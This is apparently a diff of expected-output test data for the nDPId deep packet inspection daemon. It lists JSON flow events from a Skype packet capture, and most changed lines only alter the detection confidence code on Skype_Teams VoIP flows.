+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.152","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.167","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.168","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970691783,"flow_last_seen":1431970692055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970691783,"flow_last_seen":1431970692055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.144","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.144","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970685852,"flow_last_seen":1431970686318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970685852,"flow_last_seen":1431970686318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00608{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686319,"flow_last_seen":1431970686843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1276,21 +1279,21 @@ 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970690890,"flow_last_seen":1431970705762,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":2522,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431970691584,"flow_last_seen":1431970703178,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431970691584,"flow_last_seen":1431970703178,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 